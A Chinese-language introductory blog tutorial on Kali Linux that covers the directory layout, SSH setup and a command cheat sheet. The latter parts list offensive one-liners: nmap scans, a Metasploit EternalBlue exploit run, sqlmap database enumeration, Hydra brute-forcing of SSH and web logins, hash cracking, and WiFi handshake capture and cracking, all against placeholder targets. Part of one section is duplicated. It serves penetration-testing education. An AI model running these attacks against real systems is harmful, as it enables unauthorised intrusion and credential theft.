kali Linux

Kali Linux

一款基于 Debian 的 Linux 发行版,专为网络安全测试、渗透测试、数字取证和反向工程等领域设计
默认用户名kali,密码kali
在这里插入图片描述

目录结构

Linux的目录结构,类似于一棵树,根节点是“/”
打开“文件系统根目录”,可查看根目录下的文件
在这里插入图片描述

  • bin
    存放命令/可执行文件
  • dev
    管理设备
  • etc
    配置文件
  • lib/lib32/lib64
    库文件,.so或相关后缀
  • root
    该目录为系统管理员,也称作超级权限者的用户主目录
  • usr
    这是一个非常重要的目录,用户的很多应用程序和文件都放在这个目录下
    /usr/local 一般通过编译源码方式安装的程序会放在此目录
  • var
    放着不断扩充的东西,一般将经常修改的目录放在此目录下,例如,临时目录,备份,日志文件等
  • 其他
    • boot:存放的是启动Linux时使用的一些核心文件,包括一些链连接文件以及镜像文件。
    • media:U盘、光驱等的识别。
    • mnt:让用户临时挂在别的文件系统的。
    • opt:软件安装目录
    • proc:这个目录是一个虚拟的目录,它是系统内存的映射,我们可以通过直接访问这个目录来获取系统信息。
    • run:是一个临时文件系统,存储系统启动以来的信息。当系统重启时,这个目录下的文件应该被删掉或清除。如果你的系统上有 /var/run 目录,应该让它指向 run。
    • sbin:s就是Super User的意思,这里存放的是系统管理员使用的系统管理程序。
    • srv:该目录存放一些服务启动之后需要提取的数据。
    • tmp:这个目录是用来存放一些临时文件的。
    • sys:该目录下安装了2.6内核中新出现的一个文件系统 sysfs 。sysfs文件系统集成了下面3种文件系统的信息:针对进程信息的proc文件系统、针对设备的devfs文件系统以及针对伪终端的devpts文件系统。该文件系统是内核设备树的一个直观反映。当一个内核对象被创建的时候,对应的文件和目录也在内核对象子系统中被创建。

SSH连接

可以使用MobaXterm、XShell、SecureCRT等进行连接
首先开启kali SSH服务

sudo systemctl start ssh

然后使用XShell 8连接

常用命令

  • 更新
    # 更新软件源索引
    sudo apt update
    
    # 更新所有已安装软件(包括系统组件和安全工具)
    sudo apt upgrade -y
    
    # 升级系统版本(重大更新,谨慎使用)
    sudo apt full-upgrade -y
    
    # 清理无用安装包
    sudo apt autoremove -y && sudo apt clean
    
  • 文件与目录操作
    # 列出目录内容(-l 详细信息,-a 显示隐藏文件)
    ls -la
    
    # 切换目录
    cd /path/to/directory
    
    # 创建目录(-p 递归创建父目录)
    mkdir -p test/subdir
    
    # 复制文件/目录(-r 递归复制目录)
    cp file.txt /target/path/
    cp -r dir/ /target/path/
    
    # 移动/重命名文件
    mv oldname.txt newname.txt
    mv file.txt /target/path/
    
    # 删除文件(-f 强制删除,-r 递归删除目录)
    rm file.txt
    rm -rf dir/
    
    # 查看文件内容(常用)
    cat file.txt       # 全部内容
    head -n 10 file.txt # 前10行
    tail -n 10 file.txt # 后10行
    tail -f log.txt    # 实时监控文件更新(适合看日志)
    
  • 权限管理
    # 查看文件/目录权限
    ls -l file.txt
    
    # 修改权限(r=4, w=2, x=1;u=用户, g=组, o=其他)
    chmod 755 file.sh  # 用户可读可写可执行,组和其他可读可执行
    
    # 修改所有者(user:组)
    sudo chown root:root file.txt
    
    # 切换到root用户(部分工具需要root权限)
    sudo su
    
  • 网络配置与状态
    # 查看网络接口信息(IP、MAC等)
    ip addr  # 替代旧命令 ifconfig
    ifconfig  # 部分系统仍支持
    
    # 启用/禁用网络接口(如eth0、wlan0)
    sudo ip link set eth0 up
    sudo ip link set eth0 down
    
    # 测试网络连通性
    ping -c 4 baidu.com  # -c 4 表示发送4个包后停止
    
    # 查看路由表
    ip route
    
    # 查看端口占用情况(-t  tcp, -u udp, -n 数字显示, -l 监听中)
    netstat -tuln
    ss -tuln  # 更高效的替代命令
    
    # 查看网络连接(包括进程ID)
    sudo netstat -tulnp
    
  • 信息收集
    # Nmap 端口扫描(最核心工具之一)
    nmap 192.168.1.1  # 简单扫描目标IP
    nmap -p 1-1000 192.168.1.1  # 扫描1-1000端口
    nmap -sV 192.168.1.1  # 探测端口服务版本
    nmap -O 192.168.1.1   # 探测操作系统(需root)
    nmap -A 192.168.1.1   # 全面扫描(服务+系统+脚本)
    
    # 域名信息查询
    whois example.com  # 查看域名注册信息
    dig example.com    # DNS解析查询(A记录)
    dig -t mx example.com  # 查看MX记录(邮件服务器)
    
    # 查看目标网站的IP和HTTP头
    host example.com   # 域名解析为IP
    curl -I example.com  # 查看HTTP响应头
    
  • Metasploit
    # 启动Metasploit控制台
    msfconsole
    
    # 在msfconsole内的常用命令
    search eternalblue  # 搜索漏洞模块(如永恒之蓝)
    use exploit/windows/smb/ms17_010_eternalblue  # 加载漏洞模块
    show options  # 查看模块需要配置的参数
    set RHOSTS 192.168.1.100  # 设置目标IP
    set LHOST 192.168.1.200   # 设置本地监听IP
    run  # 执行漏洞利用
    
  • Web渗透
    # SQLmap(自动检测和利用SQL注入)
    sqlmap -u "http://example.com/index.php?id=1"  # 测试目标URL
    sqlmap -u "http://example.com/index.php?id=1" --dbs  # 列出数据库
    sqlmap -u "http://example.com/index.php?id=1" -D dbname --tables  # 列出表
    
    # Burp Suite(Web渗透代理,图形化工具,命令行启动)
    burpsuite  # 启动社区版(需在图形界面操作)
    
    # Nikto(Web服务器漏洞扫描)
    nikto -h http://example.com  # 扫描目标网站
    
  • 密码攻击
    # Hydra(在线密码暴力破解)
    hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1  # 破解SSH
    hydra -L users.txt -P pass.txt http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"  # 破解Web登录
    
    # John the Ripper(哈希密码破解)
    john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt  # 用字典破解哈希文件
    john --show hash.txt  # 显示已破解的密码
    
    # Hashcat(GPU加速破解,支持多种哈希算法)
    hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt  # -m 0 表示MD5哈希
    
  • 无线网络
    # 查看无线网卡(需支持监控模式)
    iwconfig
    
    # 将无线网卡切换为监控模式(如wlan0)
    sudo airmon-ng start wlan0  # 会生成wlan0mon接口
    
    # 扫描附近WiFi
    sudo airodump-ng wlan0mon
    
    # 抓取WiFi握手包(-c 信道, --bssid 目标MAC, -w 保存文件)
    sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
    
    # 用握手包破解WiFi密码(-w 字典, 握手包文件)
    sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
    
  • 其他
    # 生成字典(crunch)
    crunch 8 8 0123456789 -o numeric8.txt  # 生成8位纯数字字典
    
    # 查看系统版本信息
    lsb_release -a
    
    # 查找文件(在系统中搜索工具或文件)
    find / -name "nmap"  # 查找nmap可执行文件
    locate sqlmap  # 快速查找(依赖数据库,需先更新:sudo updatedb)
    
    # 挂载ISO镜像(用于安装工具或查看镜像内容)
    sudo mount -o loop kali.iso /mnt
    # 查看系统版本信息
    lsb_release -a
    
    # 查找文件(在系统中搜索工具或文件)
    find / -name "nmap"  # 查找nmap可执行文件
    locate sqlmap  # 快速查找(依赖数据库,需先更新:sudo updatedb)
    
    # 挂载ISO镜像(用于安装工具或查看镜像内容)
    sudo mount -o loop kali.iso /mnt
    
    参考文章
    渗透测试-Kali Linux学习(Linux基础、Shell编程、渗透测试软件)
    作者:lady_killer9
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值